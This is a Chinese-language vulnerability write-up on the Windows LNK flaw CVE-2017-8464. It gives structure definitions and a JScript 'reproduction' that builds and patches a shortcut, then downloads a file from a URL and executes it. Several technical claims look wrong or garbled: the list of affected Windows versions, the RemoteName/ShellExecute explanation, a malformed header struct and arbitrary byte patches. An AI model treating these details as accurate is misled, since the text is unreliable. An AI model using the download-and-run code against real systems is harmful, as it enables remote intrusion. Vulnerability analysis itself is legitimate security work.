一、漏洞概述
CVE-2017-8464是一种在Windows Shell远程执行代码的漏洞。攻击者可以通过文件共享、WebDAV共享、USB、外部存储等多种方式将恶意的LNK文件注入受害用户计算机中,当用户双击打开这些恶意的LNK文件时,就会触发漏洞,攻击者就可以远程控制受害者计算机。
漏洞类型:远程执行代码漏洞
漏洞等级:严重
二、漏洞成因
在Windows Shell中,ShellExecute函数是一个非常重要的函数,它主要是用于启动一个应用程序、打开指定文件等操作。当用户双击一个Lnk文件时,ShellExecute会被调用来启动指定程序。而LNK文件中各种属性的值会通过ShellExecute函数参数传递给ShellExecute。恶意LNK文件通过特定的属性和值来操纵ShellExecute函数进而执行恶意代码。
三、漏洞分析
LNK文件是Windows文件系统中短切方式的一种,它包含了被链接的文件和目标信息。在LNK文件中,一个被称为“ShellLinkHeader”的结构体保存了多个与LNK文件相关的信息,包括LNK文件大小、文件标识符等等。此外,还有一个名为“LinkInfo”的部分,保存着LNK文件的一些特性,包括其实体路径、属性、图标等,这些信息对ShellExecute函数来说是至关重要的。
typedef struct _GUID {
ULONG Data1;
USHORT Data2;
USHORT Data3;
UCHAR Data4[8];
} GUID;
typedef struct {
GUID LinkCLSID;
ULONG LinkFlags;
ULONG FileAttributes;
FILETIME CreationTime;
FILETIME AccessTime;
FILETIME WriteTime;
ULONG FileSize;
LONG IconIndex;
ULONG ShowCommand;
short HotKey;
ULONG Reserved1;
ULONG Reserved2;
ULONG Reserved3;
} ShellLinkHeader;
typedef struct {
ULONG LinkInfoSize;
ULONG LinkInfoHeaderSize;
ULONG LinkInfoFlags;
ULONG VolumeIDOffset;
ULONG LocalBasePathOffset;
ULONG CommonNetworkRelativeLinkOffset;
ULONG CommonPathSuffixOffset;
ULONG LocalBasePathOffsetUnicode;
ULONG CommonPathSuffixOffsetUnicode;
} LinkInfo;
在漏洞的复现过程中,攻击者通过LNK文件中的值来操纵ShellExecute函数。例如,LinkInfo中保存的本地路径信息可以通过RemoteName来覆盖,当ShellExecute函数执行时,会按照RemoteName中指定的路径来执行,而不是真实路径。攻击者利用该漏洞可以操纵ShellExecute函数,从而实现对受害计算机的远程控制。
四、漏洞复现
需要注意的是,CVE-2017-8464漏洞只存在于Windows 7及其前身的Windows操作系统上,Windows 8和Windows 10并不受影响。
漏洞复现过程如下:
//创建LNK文件,设置LinkInfo信息
var shellApplication = new ActiveXObject("Shell.Application");
var folder = shellApplication.NameSpace(folderPath);
var folderItem = folder.ParseName(fileName);
var link = folderItem.GetLink;
var linkPath = folderPath + "\\" + lnkName;
var shortcut = link.CreateShortcut(linkPath);
shortcut.TargetPath = "calc.exe";
shortcut.Arguments = "";
shortcut.Description = "test shortcut";
shortcut.IconLocation = "calc.exe";
shortcut.Save();
//伪装LNK文件,RemoteName覆盖本地路径信息
var l2 = "\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
var l3 = "\x4e\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x00\x00\x2f\x00";
var fileStream = new ActiveXObject("ADODB.Stream");
fileStream.Type = 2;
fileStream.Open();
fileStream.LoadFromFile(linkPath);
fileStream.Position = 0x4c+4;
fileStream.WriteText(l2, 1);
fileStream.WriteText(l3, 1);
fileStream.SaveToFile(downloadPath, 2);
fileStream.Close();
//下载伪装的LNK文件
var objXMLHTTP = new ActiveXObject("MSXML2.XMLHTTP");
objXMLHTTP.open("GET", downloadUrl, false);
objXMLHTTP.send();
var adoStream = new ActiveXObject("ADODB.Stream");
adoStream.Type = 1;
adoStream.Open();
adoStream.Write(objXMLHTTP.ResponseBody);
adoStream.Position = 0;
adoStream.SaveToFile(downloadPath, 2);
adoStream.Close();
//双击伪装的LNK文件
var objShell = new ActiveXObject("WScript.Shell");
objShell.Run(downloadPath, 1, true);
五、漏洞防范
微软已经发布了针对该漏洞的补丁,建议用户及时升级操作系统,安装最新的安全补丁。
此外,用户在使用电脑时,要警惕不明来源文件和URL链接,避免双击或访问可能存在安全问题的文件。
六、总结
CVE-2017-8464是一种存在于Windows Shell的远程执行代码漏洞,攻击者可以通过构造LNK文件注入恶意代码,并远程控制受害者计算机。尽管漏洞已经有针对应对的安全补丁,但是还是建议用户在使用电脑时要保持警惕,避免不明来源的文件和URL链接带来的安全风险。
